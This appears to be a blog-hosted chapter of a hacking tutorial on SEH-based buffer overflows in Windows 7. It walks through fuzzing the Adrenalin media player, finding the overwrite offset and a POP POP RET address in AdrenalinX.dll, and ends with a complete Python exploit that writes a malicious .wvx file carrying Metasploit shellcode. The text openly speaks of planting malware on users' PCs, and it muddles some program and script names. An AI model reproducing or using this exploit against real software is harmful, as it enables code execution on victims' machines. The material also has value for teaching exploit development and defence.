28.
SEH Based Buffer Overflow
28.1
Introduction
28.1.1
The Basic Concept of SEH
First,
let’s discuss the concept of the SEH (Structured Exception Handler). SEH is an
exception handling mechanism that is provided by the Windows operating system.
It uses a chain structure that is associated with a linked list.
Figure 28-1 Behavior of the SEH chain
If
an exception occurs, the operating system handles the exception by following
the SEH chain. If there is a function that can handle the exception, it is
sequentially executed. If there is not, the process is skipped. Next the SEH at
the end of the chain points to”0xFFFFFFFF”, which will pass the exception
handling to the kernel. Th SEH solves a practical problem in that all
exceptions cannot be handled at the developer level and the application can
therefore operate more reliably.
Windows
7 has developed a variety of techniques to block buffer overflow attacks utilizing
SEH. The first is the “CPU Zeroing” technique that initializes the value of all
the registers to zero when the SEH is called. As mentioned earlier, simply
executing a “JMP ESP” instruction is not sufficient any more to successfully
hack the system. The second is an “SEHOP” (Structured Exception Handler
Overwrite Protection) technique that validates before moving to the next SEH
Handler address. The last is a “SafeSEH” technique that limits the addresses
that can be used as Exception Handler addresses. If all three techniques that
are mentioned above are implemented, it becomes very difficult to hack using a
buffer overflow attack. Briefly, let's find a way to successfully hack a system
by bypassing the security technology that is implemented in Windows 7 in order
to learn about the SEH Buffer Overflow techniques.
28.1.2
Basic Concepts of the SEH Buffer Overflow
Figure 28-2 Behavior of the SEH Chain
When
an exception occurs, the EXCEPTION_DISPOSITION Handler structure used for
exception handling is placed at the top of the stack. The second item of this
structure contains the address that points to the next SEH. The core of the SEH
buffer overflow attack is to take advantage of the characteristics of this
structure. The detailed operation is as follows.
(1)
EXCEPTION_DISPOSTION Handler: Place the structure that is used for
exception handling into the stack.
(2)
Running SEH: The operating system runs the Opcode in the address to which
the SEH points. Set the input value in advance to make the SEH have an address
that points to the “POP POP RET” instruction.
(3)
Runnig POP POP RET: Remove the top two values from the stack and execute
the third value. The “44 BB 00 00” value corresponds to the next SEH address
that is set at the time that the exception was generated by the operating
system.
(4) Running JMP: Execute the command to
jump by 6 bytes.
(5) Running Shell Code: Finally, run the
shell code you entered for hacking.
Now
that you have learned all the basic knowledge for an SEH buffer overflow
attacks. Let's try to make the code for the SEH buffer overflow attack in
Python.
28.2
Fuzzing and Debugging
First,
generate an application error through fuzzing, by writing the hacking code step
by step by using the debugger. Try to make Python code with the basic concepts
that were previously mentioned.
Figure 28-3 Hacking Procedures
The
general procedure is similar to that for a stack-based buffer overflow.
However, the SEH instead of the EIP is overwritten for the hacking attempt.
Fuzzing allows you to find how much data will be required to overwrite the SEH.
The debugger can be used to find the address of the “POP POP RET” instruction, and
this address must be entered for the location of the SEH. If you enter a hex
code that corresponds to the “short jmp” command into the next SEH, the
development of the “Adrenalin” executable file that runs shell code entered by
the user is then completed. Now, you are ready to plant malware on the user PC by
downloading multimedia files from the Internet.
Sample
code and the test application can be downloaded from
“http://www.exploit-db.com/exploits/26525/” site. The debugger uses the
bufferOverflowTest.py without changes. Just enter the “BlazeDVD.exe” instead of
“Play.exe” as the “processName” variable. Now when you install the downloaded
application, the test preparation has been completed.
junk=”\x41”*2500
x=open(‘Exploit.wvx’, ‘w’)
x.write(junk)
x.close()
|
The
behavior of this example is similar to that for fuzzingBlazeDVD.py. First,
create an Adrenalin executable file consisting of consecutive “A” characters of
any length. Run the Adrenalin player and bufferOverflowTest.py, and the
debugging for the player is then ready. Finally, generate an error when opening
the file “Exploit.wvx” through the player, and the debugger will output the
following results on the screen.
Figure 28-4 fuzzing test Result
The
example in the previous chapter concerned the EIP register, and the contents of
interest are in the SEH. Let's take a look at “SEH unwind” at the end. For the
fuzzing test, you can confirm the value that has been entered in the
“Exploit.wvx” file. Now what you need to do is to find out whether you can
overwrite SEH as an input value of a given length.
28.3
SEH Overwrite
In
order to generate a string with certain rules, let's check the number of
characters that can be used to overwrite the SEH. The characters from “a” to
“z” and from “0” to “9” intersect horizontally and vertically and can be used
to create a string.
Create
the “Exploit.wvx” file by running the program, and then run it through the Adrenalin
program. It is possible to monitor the error status in the debugger. Now, let's
take a look at the “SEH unwind” part because we must overwrite the SEH. The
first part is the “next SEH”, and the next part corresponds to “SEH”.
Figure 28-5 Debugging Result
You
can see “33313330” and “33333332” on the screen. The decode command can be used
to change these into a string to confirm that they correspond to “3031” and
“3233”. “3031” corresponds to the 2,140th string. Therefore, enter the dummy
string until 2140th position, and then put the address corresponding to the “POP
POP RET” command.
28.4
Find the “POP POP RET” Instruction
It
is not easy to find the corresponding command with the “pydbg” module. For
convenience, download the debugger from the following site “http://www.ollydbg.de/download.htm”.
Unzip the downloaded file and use the debugger without performing an
installation. After running the Adrenalin player first, run Ollydbg. Let's use
the “attach” function from the Ollydbg “File” menu. Find “Play.exe” and attach
it.
Figure 28-6 Attach the Executable File
The
debugger shows the state of the memory and the registers of the process on the
screen. Now, let's check the execution module information that is contained in
the memory. Select the executable modules from the “View” menu. This shows
information related to all modules used in “Play.exe”.
Figure 28-7 View Modules
Previously,
I explained that Windows 7 has many security features to prevent hacking. In
order to view the detailed information we need inspect, it is necessary to
install an additional plug-in. In general, since there are many vulnerabilities
in the DLLs of applications other than the DLLs defined in the Windows
directory, the “AdrenalinX.dll” file is selected here to try to search for the
“POP POP RET” instruction.
Double-click
the DLL and then click the right mouse button to see the “Search for a Sequence
of Commands” menu. When you type the instructions that are shown in the
following figure, you can find the start address for the instructions. When you
search for an address, you must exclude the addresses that include characters
such as “00”, “0A”, “0D”.
Figure 28-8 Find Instructions
Let's
continue the search until you find a valid address to hack. Since the address
on the front part contains “00”, let us start the search after moving to the
second half. It is therefore possible to obtain the following results.
Figure 28-9 Finding Instruction result
28.5
Executing the Attack
Now
we can complete the hacking program. 2,140 bytes for the front part are filled
with a particular character, the next SEH part is entered as hex code to jump
by only 6 bytes. In the SEH part, enter the start address for the “POP POP RET”
instruction. Finally, paste the shell code to run the Windows Calculator
program.
junk="\x41"*2140
junk+="\xeb\x06\x90\x90"#short jmp
junk+="\xcd\xda\x13\x10"#pop pop ret ***App Dll***
#Calc shellcode from msf (-b
'\x00\x0a\x0d\x0b')
junk+=("\xd9\xc8\xb8\xa0\x47\xcf\x09\xd9\x74\x24\xf4\x5f\x2b\xc9" +
"\xb1\x32\x31\x47\x17\x83\xc7\x04\x03\xe7\x54\x2d\xfc\x1b" +
"\xb2\x38\xff\xe3\x43\x5b\x89\x06\x72\x49\xed\x43\x27\x5d" +
"\x65\x01\xc4\x16\x2b\xb1\x5f\x5a\xe4\xb6\xe8\xd1\xd2\xf9" +
"\xe9\xd7\xda\x55\x29\x79\xa7\xa7\x7e\x59\x96\x68\x73\x98" +
"\xdf\x94\x7c\xc8\x88\xd3\x2f\xfd\xbd\xa1\xf3\xfc\x11\xae" +
"\x4c\x87\x14\x70\x38\x3d\x16\xa0\x91\x4a\x50\x58\x99\x15" +
"\x41\x59\x4e\x46\xbd\x10\xfb\xbd\x35\xa3\x2d\x8c\xb6\x92" +
"\x11\x43\x89\x1b\x9c\x9d\xcd\x9b\x7f\xe8\x25\xd8\x02\xeb" +
"\xfd\xa3\xd8\x7e\xe0\x03\xaa\xd9\xc0\xb2\x7f\xbf\x83\xb8" +
"\x34\xcb\xcc\xdc\xcb\x18\x67\xd8\x40\x9f\xa8\x69\x12\x84" +
"\x6c\x32\xc0\xa5\x35\x9e\xa7\xda\x26\x46\x17\x7f\x2c\x64" +
"\x4c\xf9\x6f\xe2\x93\x8b\x15\x4b\x93\x93\x15\xfb\xfc\xa2" +
"\x9e\x94\x7b\x3b\x75\xd1\x7a\xca\x44\xcf\xeb\x75\x3d\xb2" +
"\x71\x86\xeb\xf0\x8f\x05\x1e\x88\x6b\x15\x6b\x8d\x30\x91" +
"\x87\xff\x29\x74\xa8\xac\x4a\x5d\xcb\x33\xd9\x3d\x0c")
x=open('Exploit.wvx', 'w')
x.write(junk)
x.close()
|
Open
the “Exploit.wvx” file that was obtained by running fuzzingAdrenalin.py with the
Adrenalin program. Then, you can see the following results after running the
Windows Calculator program.
Figure 28-10 SEH Based Buffer Overflow Result
Windows
7 can also effectively block the SEH-based buffer overflow attack. As was
previously described, you can use the “SafeSEH ON” option when compiling the
program, and the most important keywords for hacking are vulnerabilities. After
discovering vulnerabilities by analyzing the system, the hacker can attempt to
attack the system. The first step to produce a safe program is to follow the
security recommendations provided by the vendor.
No comments:
Post a Comment